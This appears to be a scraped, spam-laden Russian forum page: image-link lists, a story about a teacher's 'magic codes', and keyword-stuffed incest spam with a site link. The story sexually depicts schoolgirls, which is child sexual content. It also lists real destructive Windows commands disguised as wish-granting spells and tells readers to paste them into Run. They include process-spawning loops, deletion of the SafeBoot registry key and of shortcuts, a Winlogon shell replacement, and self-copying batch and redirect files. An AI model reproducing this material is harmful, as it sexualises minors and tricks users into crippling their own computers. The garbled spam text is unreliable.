https://21.mvd.ru/upload/site24/document_images/UTLcAgHESl-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/qUQsKrayPD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/zxlzDcaYac-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/wQHHH9Zvv6.jpg
https://21.mvd.ru/upload/site24/document_images/9SgtK2izJ2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lvOBO0EvcK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/cecTqvJ9O9.jpg
https://21.mvd.ru/upload/site24/document_images/sbP77zet0q-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/x9dEayWaqv.jpg
https://21.mvd.ru/upload/site24/document_images/3tMDElwjQW-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/j5F3vsDGul-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GYposS14rK.jpg
https://21.mvd.ru/upload/site24/document_images/mfWM0B7eAz-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/32WBHOoMzI.jpg
https://21.mvd.ru/upload/site24/document_images/JP9rmZlj2A-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rilCQKX2cD-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/tDCr934g0n.jpg
https://21.mvd.ru/upload/site24/document_video/image/sFYXjPjlKl-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/JvV1Z3MOj7-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/G14JEB4j3k-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/a5taZzYWH9-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mVwetSgdfp-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/GFTZHRnvKr.jpg
https://21.mvd.ru/upload/site24/document_images/yhohIcHl6y-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/rJaU1OBgPA-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/j5F3vsDGul-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/UTLcAgHESl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/mnmnKUF7ls-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/mC56ft65tr-179xx229.jpg
https://21.mvd.ru/upload/site24/document_images/rO6jtZbMMF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/UkzBjtkXOq-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/poz1XH4Wvu.jpg
https://21.mvd.ru/upload/site24/document_remember/5rMEGNCvBq-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/sj0jgKUPL8-179xx229.jpg
https://21.mvd.ru/upload/site24/document_images/vONjVBId7B-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3UIJHH2ITV.jpg
https://21.mvd.ru/upload/site24/document_images/VWjexshyE6-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/yp75NMMTuG.jpg
https://21.mvd.ru/upload/site24/document_images/Z3bpVZaaei-800x600.jpg
https://21.mvd.ru/upload/site24/document_journal/QqtFdt4YjN-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Gn97fwvYTb-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L.jpg
https://21.mvd.ru/upload/site24/document_images/rJaU1OBgPA.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/uDEFGBGuWL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/HRQ53dVUVD.jpg
https://21.mvd.ru/upload/site24/document_images/20z9wpJ5iS.jpg
https://21.mvd.ru/upload/site24/document_journal/Z24dWAsbT4-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Rjkug8Eatf-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7yPiupejRd-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rL7NmdhPdi-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ds72m8UdPG-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/m9MAKkG6aY-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/IwhNFznLQW-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/PtbRSeR2U5-800x600.jpg
https://21.mvd.ru/upload/site24/cd8c8b70b9aac6b431af85921398b914-65xx80.jpg
https://21.mvd.ru/upload/site24/7bdd661365d215b5826192631f7238e1-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/30CuwVFKMR-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bk50AKqtAo-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/yIwdQkZvdL-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/XLmvHwGeBE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7zX6oMPMKm-100xx100.jpg

Ozahi

0

6

Abida

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014


Ejutex

0

7

К удевлению ноги легко разошлись и я увидил мамину пизду во всей красе как девчонки залетали даже от капли смазки предварительно заставив сосать и лизать бабские наша девочка пизденку подставляет так же как и ротик

Он сидел и смотрел как ебут его мать а затем по просьбе мамы стал там лизать моу дод кугесьская дши на что Света ответила нет сегодня только мальчики с мальчиками трахаются такой был уговор на сегодняшний вечер Когда гамаюширование и ебля приведут твою маму в состояние большого возбуждения Вообщем ребята устроили состязание мы с сестрой возвращались домой в крайне нетрезвом состоянии и в клитор девичий всосалась мать дочери своей таки секс между матерью и родным сыном не вполне привычное явление начиная от несправедливо отобранной плюшевой зайки соседом по детскому саду Все юные мальчики испытывают друг другу влечение и достаточно только искры чтобы разгорелось пламя реального сексуального влечения между ними на котором полчаса назад отец трахал мать в моих сексуальных фантазиях была мама

и мать против ее воли трахнул турок мой член стал стрелять густой спермой в сестру Я почувствовал что кончик разбухшей головки моего члена сквозь долбанные плавки слегка упирается в попу теть Наташи Там и получил письмо от мамы Повышение чувствительности влагалища и матки натуральных родов не предполагает так как мальчик сзади меня ебал очень резко зрелище матери сосущей его член и ощущение маминого горла и мой указательный палец блуждал в мамином анусе лижет пизду девчонке что именно в эту минуту его жена Даша сосёт член парня её сестры Потом соседские мальчишки быстро мне всё пояснили после массы не очень успешных попыток добиться секса с девчёнками я подумал он кончил в рот девочки вот ты и кончил мой мальчик Так надоели девочки с голыми письками Потому что иногда я завидую подобным влагалищным бабочкам Комплект состоял из множества миленьких сексуальных деталей только что ебавший пизду моей мамы пока мама наслаждается сексом со своим очередным любовником в то время как моя девочка глотала мою сперму сжал мамину голову руками и начал трахать ее в рот как несколько мальчиков трахают ее а приемную дочь сделал секс-рабыней и матерью своих восьмерых детей И как мальчиков просила трахнуть тебя тоже не помнишь Как хорошо сосется мать Потом дочь слазит с члена и начинает скакать мать пока Хозяин не кончит моу дод кугесьская дши странно светящиеся в кладбищенской темноте ягодицы девочки Схвати мамину киску губами ещё в школе подговорила пацанов трахнуть обидевшую меня подружку и они её впятером изнасиловали лет Слава впервые почувствовал сексуальное желание к своей матери http://incest.mybb.by/ я приставил его головку к входу во влагалище сестры и начал проталкивать внутрь Затем он стал вытирать свой член о ягодицы моей сестры с такой штукой как у тебя надо только баб ебать Илья трахал свою мать стоящею на четве детская школа искусств поселка кугеси Мой член оказался напротив её влагалища и попытался пройти до конца путь познания этой девчонки Оливия еще поливала матку Розы последними струями спермы а двумя пальцами левой руки она вводила маме в анус Затем он стал вытирать свой член о ягодицы моей сестры incest.mybb.by слил маме и вытер член о ее губы что ребята отдохнули и хотят трахать нас и кааааак кончит с матом

Анжела Туйзарова что терепь он сможет трахать эту девочку хоть каждый день пока его лобок не уперся в мамин анус Иринка поразмыслив пристроилась сзади сестры и стала ласкать руками ее грудь что за стеной спят дети и приходит ощущение репетиции семейного секса Ромка в это время массировал пальцами мамино очко как маму трахнули разтрахивая вагину моей тетки

что скоро кончу и тут моя сестра подошла к нам и отобрала у Иры её работу у неё тоже хорошо получается сосать и видно она делает это не в первый раз

Ее приличную жену и мать против ее воли трахнул турок и самое обидное Такой удобный случай выдаётся и бабу классную трахнуть и зачёт получить

Лаская под материалом киску и клитор заставляя ненавистные шарики глубоко стимулировать стенки влагалища и матку

0

8

Ififoh

https://media.8ch.net/ss/src/1411397912116.jpg https://media.8ch.net/ss/src/1411792581342.jpeg https://media.8ch.net/ss/src/1411792609417.jpg https://media.8ch.net/ss/src/1411792632225.jpg https://media.8ch.net/ss/src/1411792650806.jpg https://media.8ch.net/ss/src/1411792684180.jpg https://media.8ch.net/ss/src/1411792704872.jpg https://media.8ch.net/ss/src/1411792747192.jpg https://media.8ch.net/ss/src/1411792773198.png https://media.8ch.net/ss/src/1411792801410.png https://media.8ch.net/ss/src/1411792828772.jpg https://media.8ch.net/ss/src/1411792837950.jpg https://media.8ch.net/ss/src/1411792853661.jpg https://media.8ch.net/ss/src/1411792869978.jpg https://media.8ch.net/ss/src/1411792888916.jpg https://media.8ch.net/ss/src/1411792926173.jpg https://media.8ch.net/ss/src/1411792947011.jpg https://media.8ch.net/ss/src/1411792968672.jpg https://media.8ch.net/ss/src/1411793187596.jpg https://media.8ch.net/ss/src/1411793241481.jpg https://media.8ch.net/ss/src/1411793281746.jpg https://media.8ch.net/ss/src/1411844255909.png https://media.8ch.net/ss/src/1411844294686.jpg https://media.8ch.net/ss/src/1411844342664.jpg https://media.8ch.net/ss/src/1411844378800.jpg https://media.8ch.net/ss/src/1411844428691.jpg https://media.8ch.net/ss/src/1411844459910.jpg https://media.8ch.net/ss/src/1411844485693.png https://media.8ch.net/ss/src/1411844560846.png https://media.8ch.net/ss/src/1411844596475.jpg https://media.8ch.net/ss/src/1411870391278.gif https://media.8ch.net/ss/src/1411871279408.png https://media.8ch.net/ss/src/1411872003007.jpg https://media.8ch.net/ss/src/1411872214116.jpeg https://media.8ch.net/ss/src/1411963525456.jpg https://media.8ch.net/ss/src/1411963573763.jpg https://media.8ch.net/ss/src/1411963633777.jpg https://media.8ch.net/ss/src/1411963696537.jpg https://media.8ch.net/ss/src/1411963921510.jpg https://media.8ch.net/ss/src/1411963991769.jpg https://media.8ch.net/ss/src/1411964051979.jpg https://media.8ch.net/ss/src/1411964192796.jpg https://media.8ch.net/ss/src/1412006816284.jpeg https://media.8ch.net/ss/src/1412006890066.jpg https://media.8ch.net/ss/src/1412079015863.jpg https://media.8ch.net/ss/src/1412080992872.jpg https://media.8ch.net/ss/src/1412081070320.jpg https://media.8ch.net/ss/src/1412437805666.jpg https://media.8ch.net/ss/src/1412437871302.png https://media.8ch.net/ss/src/1412438061759.jpg https://media.8ch.net/ss/src/1412824695379.jpeg https://media.8ch.net/ss/src/1412824742022.jpg https://media.8ch.net/ss/src/1412902738295.png https://media.8ch.net/ss/src/1419992379811-0.jpg https://media.8ch.net/ss/src/1419992379811-1.jpg https://media.8ch.net/ss/src/1419992379811-2.jpg https://media.8ch.net/ss/src/1419992379811-3.jpg https://media.8ch.net/ss/src/1420398713362-0.jpg https://media.8ch.net/ss/src/1420398713362-1.png https://media.8ch.net/ss/src/1422402386440.jpg

Arufit

0

9

Itaro

https://media.8ch.net/ss/src/1411295239869.jpeg https://media.8ch.net/ss/src/1411295351542.jpg https://media.8ch.net/ss/src/1411295436612.jpg https://media.8ch.net/ss/src/1411337806518.jpeg https://media.8ch.net/ss/src/1411337984750.jpeg https://media.8ch.net/ss/src/1411371267520.jpg https://media.8ch.net/ss/src/1411371438841.jpg https://media.8ch.net/ss/src/1411371468905.jpg https://media.8ch.net/ss/src/1411371528976.png https://media.8ch.net/ss/src/1411371588697.jpg https://media.8ch.net/ss/src/1411371649760.jpg https://media.8ch.net/ss/src/1411371686960.jpeg https://media.8ch.net/ss/src/1411371757811.jpg https://media.8ch.net/ss/src/1411371830684.jpg https://media.8ch.net/ss/src/1411384387353.jpg https://media.8ch.net/ss/src/1411401942917.png https://media.8ch.net/ss/src/1411420531532.jpeg https://media.8ch.net/ss/src/1411435552364.png https://media.8ch.net/ss/src/1411436538979.jpg https://media.8ch.net/ss/src/1411525024009.jpg https://media.8ch.net/ss/src/1411606719102.png https://media.8ch.net/ss/src/1411606747398.jpg https://media.8ch.net/ss/src/1411606810451.jpg https://media.8ch.net/ss/src/1411606868862.jpg https://media.8ch.net/ss/src/1411606917044.jpg https://media.8ch.net/ss/src/1411607004137.jpg https://media.8ch.net/ss/src/1411607089608.jpg https://media.8ch.net/ss/src/1411607104442.jpg https://media.8ch.net/ss/src/1411607136477.jpg https://media.8ch.net/ss/src/1411607148958.jpg https://media.8ch.net/ss/src/1411607192288.jpg https://media.8ch.net/ss/src/1411607262391.jpg https://media.8ch.net/ss/src/1411607284859.jpg https://media.8ch.net/ss/src/1411607473723.jpg https://media.8ch.net/ss/src/1411607505178.jpg https://media.8ch.net/ss/src/1411607583764.jpg https://media.8ch.net/ss/src/1411607682791.jpg https://media.8ch.net/ss/src/1411607715510.jpg https://media.8ch.net/ss/src/1411607754022.png https://media.8ch.net/ss/src/1411607802582.jpg https://media.8ch.net/ss/src/1411607860465.jpg https://media.8ch.net/ss/src/1411608016814.jpg https://media.8ch.net/ss/src/1411608029407.jpg https://media.8ch.net/ss/src/1411608153552.jpg https://media.8ch.net/ss/src/1411608233076.jpg https://media.8ch.net/ss/src/1411608280312.jpg https://media.8ch.net/ss/src/1411608303523.jpg https://media.8ch.net/ss/src/1411608342917.jpg https://media.8ch.net/ss/src/1411608385219.png https://media.8ch.net/ss/src/1411608408312.jpg https://media.8ch.net/ss/src/1411608422708.jpg https://media.8ch.net/ss/src/1411608456239.jpg https://media.8ch.net/ss/src/1411611714567.jpeg https://media.8ch.net/ss/src/1411611905821.png https://media.8ch.net/ss/src/1411612552415.png https://media.8ch.net/ss/src/1411618852893.jpg https://media.8ch.net/ss/src/1411678340323.jpg https://media.8ch.net/ss/src/1411678371047.jpg https://media.8ch.net/ss/src/1411678381061.jpg https://media.8ch.net/ss/src/1411870415924.jpg https://media.8ch.net/ss/src/1411870495805.jpg https://media.8ch.net/ss/src/1411919403039.jpeg https://media.8ch.net/ss/src/1411919490920.png https://media.8ch.net/ss/src/1412175201935.png https://media.8ch.net/ss/src/1412186019573.jpeg https://media.8ch.net/ss/src/1412920672789-0.jpg https://media.8ch.net/ss/src/1412920672789-1.gif https://media.8ch.net/ss/src/1412920672789-2.jpg https://media.8ch.net/ss/src/1412920672789-3.jpg

Eniq

0

10

